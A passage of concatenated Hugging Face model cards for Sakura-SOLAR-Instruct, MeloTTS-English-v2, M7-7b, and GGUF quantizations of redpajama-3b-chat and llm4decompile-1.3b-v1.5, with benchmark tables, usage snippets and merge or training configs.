num_few_shot: 5
metrics:
- type: acc
value: 83.66
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 65.2
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
---
# **Sakura-SOLAR-Instruct**
<img src='./sakura.png' width=512>
**This model was developed by the LLM research consortium of (주)미디어그룹사람과숲 and (주)마커.**
## Model Details
**Model Developers** Kyujin Han (kyujinpy)
**Method**
Using [Mergekit](https://github.com/cg123/mergekit).
I shared the information about my model. (training and code)
**Please see: [⭐Sakura-SOLAR](https://github.com/KyujinHan/Sakura-SOLAR-DPO).**
**Blog**
- [Sakura-SOLAR model development process and retrospective (in Korean)](https://kyujinpy.tistory.com/122).
# **Model Benchmark**
## Open leaderboard
- Follow up as [link](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard).
| Model | Average | ARC | HellaSwag | MMLU | TruthfulQA | Winogrande | GSM8K |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Sakura-SOLRCA-Instruct-DPO | 74.05 | 71.16 | 88.49 | 66.17 | 72.10 | 82.95 | 63.46 |
| Sakura-SOLAR-Instruct-DPO-v2 | 74.14 | 70.90 | 88.41 | 66.48 | 71.86 | 83.43 | 63.76 |
| [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) | 74.40 | 70.99 | 88.42 | 66.33 | 71.79 | 83.66 | 65.20 |
> Rank 1 as of 2023.12.27, 11:50 PM
# Implementation Code
```python
### Sakura-SOLAR-Instruct
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
repo = "kyujinpy/Sakura-SOLAR-Instruct"
OpenOrca = AutoModelForCausalLM.from_pretrained(
repo,
return_dict=True,
torch_dtype=torch.float16,
device_map='auto'
)
OpenOrca_tokenizer = AutoTokenizer.from_pretrained(repo)
```
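A minimal generation sketch to go with the loading code above; the prompt wording and sampling settings below are illustrative assumptions, not taken from the training setup.
```python
# Minimal sketch: generate a completion with the model loaded above.
# The prompt format and sampling parameters are assumptions.
prompt = "### User:\nTell me about the Sakura-SOLAR merge.\n\n### Assistant:\n"
inputs = OpenOrca_tokenizer(prompt, return_tensors="pt").to(OpenOrca.device)
with torch.no_grad():
    output = OpenOrca.generate(**inputs, max_new_tokens=256, do_sample=True, temperature=0.7)
print(OpenOrca_tokenizer.decode(output[0], skip_special_tokens=True))
```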
---
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_kyujinpy__Sakura-SOLAR-Instruct)
| Metric |Value|
|---------------------------------|----:|
|Avg. |74.40|
|AI2 Reasoning Challenge (25-Shot)|70.99|
|HellaSwag (10-Shot) |88.42|
|MMLU (5-Shot) |66.33|
|TruthfulQA (0-shot) |71.79|
|Winogrande (5-shot) |83.66|
|GSM8k (5-shot) |65.20|
|
myshell-ai/MeloTTS-English-v2 | myshell-ai | "2024-03-01T17:34:32Z" | 3,625 | 17 | transformers | [
"transformers",
"text-to-speech",
"ko",
"license:mit",
"endpoints_compatible",
"region:us"
] | text-to-speech | "2024-02-29T14:53:13Z" | ---
license: mit
language:
- ko
pipeline_tag: text-to-speech
---
# MeloTTS
MeloTTS is a **high-quality multi-lingual** text-to-speech library by [MyShell.ai](https://myshell.ai). Supported languages include:
| Model card | Example |
| --- | --- |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (American) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-US/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (British) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-BR/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (Indian) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN_INDIA/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (Australian) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-AU/speed_1.0/sent_000.wav) |
| [English](https://huggingface.co/myshell-ai/MeloTTS-English-v2) (Default) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/en/EN-Default/speed_1.0/sent_000.wav) |
| [Spanish](https://huggingface.co/myshell-ai/MeloTTS-Spanish) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/es/ES/speed_1.0/sent_000.wav) |
| [French](https://huggingface.co/myshell-ai/MeloTTS-French) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/fr/FR/speed_1.0/sent_000.wav) |
| [Chinese](https://huggingface.co/myshell-ai/MeloTTS-Chinese) (mix EN) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/zh/ZH/speed_1.0/sent_008.wav) |
| [Japanese](https://huggingface.co/myshell-ai/MeloTTS-Japanese) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/jp/JP/speed_1.0/sent_000.wav) |
| [Korean](https://huggingface.co/myshell-ai/MeloTTS-Korean/) | [Link](https://myshell-public-repo-hosting.s3.amazonaws.com/myshellttsbase/examples/kr/KR/speed_1.0/sent_000.wav) |
Some other features include:
- The Chinese speaker supports `mixed Chinese and English`.
- Fast enough for `CPU real-time inference`.
## Usage
### Without Installation
An unofficial [live demo](https://huggingface.co/spaces/mrfakename/MeloTTS) is hosted on Hugging Face Spaces.
#### Use it on MyShell
There are hundreds of TTS models on MyShell, many more than MeloTTS alone. See examples [here](https://github.com/myshell-ai/MeloTTS/blob/main/docs/quick_use.md#use-melotts-without-installation).
More can be found at the widget center of [MyShell.ai](https://app.myshell.ai/robot-workshop).
### Install and Use Locally
Follow the installation steps [here](https://github.com/myshell-ai/MeloTTS/blob/main/docs/install.md#linux-and-macos-install) before using the following snippet:
```python
from melo.api import TTS
# Speed is adjustable
speed = 1.0
# CPU is sufficient for real-time inference.
# You can set it manually to 'cpu' or 'cuda' or 'cuda:0' or 'mps'
device = 'auto' # Will automatically use GPU if available
# English
text = "Did you ever hear a folk tale about a giant turtle?"
model = TTS(language='EN_V2', device=device)
speaker_ids = model.hps.data.spk2id
# American accent
output_path = 'en-us.wav'
model.tts_to_file(text, speaker_ids['EN-US'], output_path, speed=speed)
# British accent
output_path = 'en-br.wav'
model.tts_to_file(text, speaker_ids['EN-BR'], output_path, speed=speed)
# Indian accent
output_path = 'en-india.wav'
model.tts_to_file(text, speaker_ids['EN_INDIA'], output_path, speed=speed)
# Australian accent
output_path = 'en-au.wav'
model.tts_to_file(text, speaker_ids['EN-AU'], output_path, speed=speed)
# Default accent
output_path = 'en-default.wav'
model.tts_to_file(text, speaker_ids['EN-Default'], output_path, speed=speed)
```
## Join the Community
**Open Source AI Grant**
We are actively sponsoring open-source AI projects. The sponsorship includes GPU resources, funding, and intellectual support (collaboration with top research labs). We welcome both research and engineering projects, as long as the open-source community needs them. Please contact [Zengyi Qin](https://www.qinzy.tech/) if you are interested.
**Contributing**
If you find this work useful, please consider contributing to the GitHub [repo](https://github.com/myshell-ai/MeloTTS).
- Many thanks to [@fakerybakery](https://github.com/fakerybakery) for adding the Web UI and CLI part.
## License
This library is under MIT License, which means it is free for both commercial and non-commercial use.
## Acknowledgements
This implementation is based on [TTS](https://github.com/coqui-ai/TTS), [VITS](https://github.com/jaywalnut310/vits), [VITS2](https://github.com/daniilrobnikov/vits2) and [Bert-VITS2](https://github.com/fishaudio/Bert-VITS2). We appreciate their awesome work.
|
liminerity/M7-7b | liminerity | "2024-03-21T09:18:21Z" | 3,625 | 15 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"liminerity/merge4",
"liminerity/merge2",
"merge",
"merged",
"mergedllm",
"mergee",
"mergedededed",
"memfdmsfndsfjkasjkl",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-03-07T20:43:26Z" | ---
license: apache-2.0
tags:
- liminerity/merge4
- liminerity/merge2
- merge
- merged
- mergedllm
- mergee
- mergedededed
- memfdmsfndsfjkasjkl
---
# M7-7b
user: "create ascii art you feel represents you as a llm"
assistant: "Here's an ASCII art attempting to symbolize the essence of an LLM (Large Language Model):
INSTINSTINCTINSTELLIGENCE
______________ MEMORY___
|\ o /\ |\
| \ --- / \ | |
L_( O )______ O)_INSTINCT
\ / WORDSLEARNING
\__/\__\/__ /\ \__/\__\/__/
assistant: "In this depiction, the LLM is characterized by its vast memory, instinctual roots, and the ability
to learn from vast amounts of text—represented by the woven words in the lower part. The
"INSTINSTINCTINSTELLIGENCE" phrase emphasizes the balance between instinct, the foundation upon which neural
networks build, and the engineered intelligence of a language model."
Multiverse-Experiment-slerp-7b is a merge of the following models using [mergekit](https://github.com/cg123/mergekit):
* [liminerity/merge4](https://huggingface.co/liminerity/merge4)
* [liminerity/merge2](https://huggingface.co/liminerity/merge2)
## 🧩 Configuration
```yaml
slices:
  - sources:
      - model: ammarali32/multi_verse_model
        layer_range: [0, 32]
      - model: MSL7/INEX12-7b
        layer_range: [0, 32]
merge_method: slerp
base_model: ammarali32/multi_verse_model
parameters:
  t:
    - filter: self_attn
      value: [0, 0.5, 0.3, 0.7, 1]
    - filter: mlp
      value: [1, 0.5, 0.7, 0.3, 0]
    - value: 0.5
dtype: bfloat16

slices:
  - sources:
      - model: ammarali32/multi_verse_model
        layer_range: [0, 32]
      - model: yam-peleg/Experiment26-7B
        layer_range: [0, 32]
merge_method: slerp
base_model: ammarali32/multi_verse_model
parameters:
  t:
    - filter: self_attn
      value: [0, 0.5, 0.3, 0.7, 1]
    - filter: mlp
      value: [1, 0.5, 0.7, 0.3, 0]
    - value: 0.5
dtype: bfloat16

slices:
  - sources:
      - model: liminerity/merge3
        layer_range: [0, 32]
      - model: ammarali32/multi_verse_model
        layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge3
parameters:
  t:
    - filter: self_attn
      value: [0, 0.5, 0.3, 0.7, 1]
    - filter: mlp
      value: [1, 0.5, 0.7, 0.3, 0]
    - value: 0.5
dtype: bfloat16

slices:
  - sources:
      - model: liminerity/merge1
        layer_range: [0, 32]
      - model: liminerity/merge
        layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge1
parameters:
  t:
    - filter: self_attn
      value: [0, 0.5, 0.3, 0.7, 1]
    - filter: mlp
      value: [1, 0.5, 0.7, 0.3, 0]
    - value: 0.5
dtype: bfloat16

slices:
  - sources:
      - model: liminerity/merge3
        layer_range: [0, 32]
      - model: yam-peleg/Experiment26-7B
        layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge3
parameters:
  t:
    - filter: self_attn
      value: [0, 0.5, 0.3, 0.7, 1]
    - filter: mlp
      value: [1, 0.5, 0.7, 0.3, 0]
    - value: 0.5
dtype: bfloat16

slices:
  - sources:
      - model: liminerity/merge4
        layer_range: [0, 32]
      - model: liminerity/merge2
        layer_range: [0, 32]
merge_method: slerp
base_model: liminerity/merge4
parameters:
  t:
    - filter: self_attn
      value: [0, 0.5, 0.3, 0.7, 1]
    - filter: mlp
      value: [1, 0.5, 0.7, 0.3, 0]
    - value: 0.5
dtype: bfloat16
``` |
RichardErkhov/ikala_-_redpajama-3b-chat-gguf | RichardErkhov | "2024-06-06T14:58:23Z" | 3,625 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-06T10:41:51Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
redpajama-3b-chat - GGUF
- Model creator: https://huggingface.co/ikala/
- Original model: https://huggingface.co/ikala/redpajama-3b-chat/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [redpajama-3b-chat.Q2_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q2_K.gguf) | Q2_K | 1.01GB |
| [redpajama-3b-chat.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ3_XS.gguf) | IQ3_XS | 1.14GB |
| [redpajama-3b-chat.IQ3_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ3_S.gguf) | IQ3_S | 1.16GB |
| [redpajama-3b-chat.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K_S.gguf) | Q3_K_S | 1.16GB |
| [redpajama-3b-chat.IQ3_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ3_M.gguf) | IQ3_M | 1.28GB |
| [redpajama-3b-chat.Q3_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K.gguf) | Q3_K | 1.38GB |
| [redpajama-3b-chat.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K_M.gguf) | Q3_K_M | 1.38GB |
| [redpajama-3b-chat.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q3_K_L.gguf) | Q3_K_L | 1.49GB |
| [redpajama-3b-chat.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ4_XS.gguf) | IQ4_XS | 1.43GB |
| [redpajama-3b-chat.Q4_0.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_0.gguf) | Q4_0 | 1.49GB |
| [redpajama-3b-chat.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.IQ4_NL.gguf) | IQ4_NL | 1.5GB |
| [redpajama-3b-chat.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_K_S.gguf) | Q4_K_S | 1.5GB |
| [redpajama-3b-chat.Q4_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_K.gguf) | Q4_K | 1.66GB |
| [redpajama-3b-chat.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_K_M.gguf) | Q4_K_M | 1.66GB |
| [redpajama-3b-chat.Q4_1.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q4_1.gguf) | Q4_1 | 1.64GB |
| [redpajama-3b-chat.Q5_0.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_0.gguf) | Q5_0 | 1.8GB |
| [redpajama-3b-chat.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_K_S.gguf) | Q5_K_S | 1.8GB |
| [redpajama-3b-chat.Q5_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_K.gguf) | Q5_K | 1.93GB |
| [redpajama-3b-chat.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_K_M.gguf) | Q5_K_M | 1.93GB |
| [redpajama-3b-chat.Q5_1.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q5_1.gguf) | Q5_1 | 1.95GB |
| [redpajama-3b-chat.Q6_K.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q6_K.gguf) | Q6_K | 2.12GB |
| [redpajama-3b-chat.Q8_0.gguf](https://huggingface.co/RichardErkhov/ikala_-_redpajama-3b-chat-gguf/blob/main/redpajama-3b-chat.Q8_0.gguf) | Q8_0 | 2.75GB |
Original model description:
---
license: cc-by-nc-2.0
language:
- en
- zh
- ja
tags:
- sft
pipeline_tag: text-generation
widget:
- text: >-
<|prompter|>What is a meme, and what's the history behind this
word?<|endoftext|><|assistant|>
- text: <|prompter|>What's the Earth total population<|endoftext|><|assistant|>
- text: >-
<|prompter|>Write a story about future of AI
development<|endoftext|><|assistant|>
datasets:
- OpenAssistant/oasst1
- databricks/databricks-dolly-15k
- anon8231489123/ShareGPT_Vicuna_unfiltered
- LIUM/tedlium
- theblackcat102/joke_explaination
---
# Redpajama-3B SFT model

It is based on RedPajama 3B, fine-tuned on human demonstrations of assistant conversations collected through the [https://open-assistant.io/](https://open-assistant.io/) human feedback web app before April 12, 2023.
Supervised fine-tuning was performed with a sequence length of 5,120.
## Model Details
- **Developed by:** [Open-Assistant Contributors](https://open-assistant.io/team) and [iKala](https://ikala.ai/)
- **Model type:** Transformer-based Language Model
- **Language:** English, Chinese, Japanese
- **Finetuned from:** [togethercomputer/RedPajama-INCITE-Base-3B-v1](https://huggingface.co/togethercomputer/RedPajama-INCITE-Base-3B-v1)
- **Code:** [Open-Assistant/model/model_training](https://github.com/LAION-AI/Open-Assistant/tree/main/model/model_training)
- **License:** Non commercial
## Prompting
Two special tokens are used to mark the beginning of user and assistant turns:
`<|prompter|>` and `<|assistant|>`. Each turn ends with a `<|endoftext|>` token.
Input prompt example:
```
<|prompter|>What is a meme, and what's the history behind this word?<|endoftext|><|assistant|>
```
The input ends with the `<|assistant|>` token to signal that the model should
start generating the assistant reply.
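For illustration, a minimal sketch of generating a reply with this prompt format using the original (non-GGUF) checkpoint; the dtype, device placement, and sampling settings are assumptions.
```python
# Minimal sketch: build a prompt with the special tokens above and generate a reply.
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

model_id = "ikala/redpajama-3b-chat"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")

prompt = "<|prompter|>What is a meme, and what's the history behind this word?<|endoftext|><|assistant|>"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=256, do_sample=True, temperature=0.7)
print(tokenizer.decode(output[0][inputs.input_ids.shape[1]:], skip_special_tokens=True))
```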
## Benchmark
| model | MMLU | BBH | Humaneval @10 |
|---|---|---|---|
| [ikala/redpajama-3b-chat](https://huggingface.co/ikala/redpajama-3b-chat) | 24.6 | 29.3 | 4.8 |
| [ikala/bloom-zh-3b-chat](https://huggingface.co/ikala/bloom-zh-3b-chat) | 31.4 | 30.2 | 0.0 |
| llama-7b (reference) | 30.9 | 27.6 | 10.3 |
## Dev Details
- base model: [togethercomputer/RedPajama-INCITE-Base-3B-v1](https://huggingface.co/togethercomputer/RedPajama-INCITE-Base-3B-v1)
- checkpoint: 1 epoch (6000 steps)
- hardware: NVIDIA RTX A6000 x 4
command: `deepspeed trainer_sft.py --configs defaults redpajama-3b datasets --num_train_epochs 2 --deepspeed`
data:
```
datasets:
  - wmt2019_zh-en:
      max_val_set: 1000
      max_train_set: 20000
  - ted_trans_en-ja:
      max_val_set: 1000
      max_train_set: 20000
  - ted_trans_zh-ja:
      max_val_set: 1000
      max_train_set: 20000
  - ikala:
      input_file_path: export_conversation_v4.4.jsonl
      val_split: 0.05
  - dolly15k:
      val_split: 0.05
  - oasst_export:
      lang: "bg,ca,cs,da,de,en,es,fr,hr,hu,it,nl,pl,pt,ro,ru,sl,sr,sv,uk,zh,ja,th,ko"
      input_file_path: 2023-04-12_oasst_release_ready_synth.jsonl.gz
      val_split: 0.05
  - joke
  - gsm8k
  - webgpt
```
The mixture includes the internal `ikala` dataset, so if you try to reproduce the training, please remove that dataset from the config.
redpajama-3b:
```
redpajama-3b:
  dtype: fp16
  log_dir: "redpajama_3b"
  learning_rate: 1e-5
  model_name: saved_models/RedPajama-INCITE-Base-3B-v1
  output_dir: ikala_v4_3b
  weight_decay: 0.0
  max_length: 8196
  warmup_steps: 2000
  gradient_checkpointing: true
  gradient_accumulation_steps: 32
  per_device_train_batch_size: 1
  per_device_eval_batch_size: 2
  eval_steps: 500
  save_steps: 1000
  num_train_epochs: 8
  save_total_limit: 2
  deepspeed_config: configs/zero3_config_sft.json
```
zero config:
```
{
"fp16": {
"enabled": "auto",
"loss_scale": 0,
"loss_scale_window": 1000,
"initial_scale_power": 16,
"hysteresis": 2,
"min_loss_scale": 1
},
"bf16": {
"enabled": "auto"
},
"optimizer": {
"type": "AdamW",
"params": {
"lr": "auto",
"betas": "auto",
"eps": "auto",
"weight_decay": "auto"
}
},
"scheduler": {
"type": "WarmupDecayLR",
"params": {
"warmup_min_lr": "auto",
"warmup_max_lr": "auto",
"warmup_num_steps": "auto",
"warmup_type": "linear",
"total_num_steps": "auto"
}
},
"zero_optimization": {
"stage": 3,
"overlap_comm": true,
"contiguous_gradients": true,
"sub_group_size": 1e9,
"reduce_bucket_size": "auto",
"stage3_prefetch_bucket_size": "auto",
"stage3_param_persistence_threshold": "auto",
"stage3_max_live_parameters": 1e9,
"stage3_max_reuse_distance": 1e9,
"stage3_gather_16bit_weights_on_model_save": true
},
"gradient_accumulation_steps": "auto",
"gradient_clipping": "auto",
"steps_per_print": 2000,
"train_batch_size": "auto",
"train_micro_batch_size_per_gpu": "auto",
"wall_clock_breakdown": false
}
```
|
RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf | RichardErkhov | "2024-06-30T02:56:58Z" | 3,622 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-30T02:33:34Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
llm4decompile-1.3b-v1.5 - GGUF
- Model creator: https://huggingface.co/LLM4Binary/
- Original model: https://huggingface.co/LLM4Binary/llm4decompile-1.3b-v1.5/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [llm4decompile-1.3b-v1.5.Q2_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q2_K.gguf) | Q2_K | 0.52GB |
| [llm4decompile-1.3b-v1.5.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ3_XS.gguf) | IQ3_XS | 0.57GB |
| [llm4decompile-1.3b-v1.5.IQ3_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ3_S.gguf) | IQ3_S | 0.6GB |
| [llm4decompile-1.3b-v1.5.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K_S.gguf) | Q3_K_S | 0.6GB |
| [llm4decompile-1.3b-v1.5.IQ3_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ3_M.gguf) | IQ3_M | 0.63GB |
| [llm4decompile-1.3b-v1.5.Q3_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K.gguf) | Q3_K | 0.66GB |
| [llm4decompile-1.3b-v1.5.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K_M.gguf) | Q3_K_M | 0.66GB |
| [llm4decompile-1.3b-v1.5.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q3_K_L.gguf) | Q3_K_L | 0.69GB |
| [llm4decompile-1.3b-v1.5.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ4_XS.gguf) | IQ4_XS | 0.7GB |
| [llm4decompile-1.3b-v1.5.Q4_0.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_0.gguf) | Q4_0 | 0.72GB |
| [llm4decompile-1.3b-v1.5.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.IQ4_NL.gguf) | IQ4_NL | 0.73GB |
| [llm4decompile-1.3b-v1.5.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_K_S.gguf) | Q4_K_S | 0.76GB |
| [llm4decompile-1.3b-v1.5.Q4_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_K.gguf) | Q4_K | 0.81GB |
| [llm4decompile-1.3b-v1.5.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_K_M.gguf) | Q4_K_M | 0.81GB |
| [llm4decompile-1.3b-v1.5.Q4_1.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q4_1.gguf) | Q4_1 | 0.8GB |
| [llm4decompile-1.3b-v1.5.Q5_0.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_0.gguf) | Q5_0 | 0.87GB |
| [llm4decompile-1.3b-v1.5.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_K_S.gguf) | Q5_K_S | 0.89GB |
| [llm4decompile-1.3b-v1.5.Q5_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_K.gguf) | Q5_K | 0.93GB |
| [llm4decompile-1.3b-v1.5.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_K_M.gguf) | Q5_K_M | 0.93GB |
| [llm4decompile-1.3b-v1.5.Q5_1.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q5_1.gguf) | Q5_1 | 0.95GB |
| [llm4decompile-1.3b-v1.5.Q6_K.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q6_K.gguf) | Q6_K | 1.09GB |
| [llm4decompile-1.3b-v1.5.Q8_0.gguf](https://huggingface.co/RichardErkhov/LLM4Binary_-_llm4decompile-1.3b-v1.5-gguf/blob/main/llm4decompile-1.3b-v1.5.Q8_0.gguf) | Q8_0 | 1.33GB |
Original model description:
---
license: mit
tags:
- decompile
- binary
widget:
- text: "# This is the assembly code:\n<func0>:\nendbr64\nlea (%rdi,%rsi,1),%eax\nretq\n# What is the source code?\n"
---
### 1. Introduction of LLM4Decompile
LLM4Decompile aims to decompile x86 assembly instructions into C. The newly released V1.5 series is trained with a larger dataset (15B tokens) and a maximum token length of 4,096, and achieves remarkable performance (up to 100% improvement) compared to the previous model.
- **Github Repository:** [LLM4Decompile](https://github.com/albertan017/LLM4Decompile)
### 2. Evaluation Results
| Model/Benchmark | HumanEval-Decompile | | | | | ExeBench | | | | |
|:----------------------:|:-------------------:|:-------:|:-------:|:-------:|:-------:|:--------:|:-------:|:-------:|:-------:|:-------:|
| Optimization Level | O0 | O1 | O2 | O3 | AVG | O0 | O1 | O2 | O3 | AVG |
| DeepSeek-Coder-6.7B | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0000 |
| GPT-4o | 0.3049 | 0.1159 | 0.1037 | 0.1159 | 0.1601 | 0.0443 | 0.0328 | 0.0397 | 0.0343 | 0.0378 |
| LLM4Decompile-End-1.3B | 0.4720 | 0.2061 | 0.2122 | 0.2024 | 0.2732 | 0.1786 | 0.1362 | 0.1320 | 0.1328 | 0.1449 |
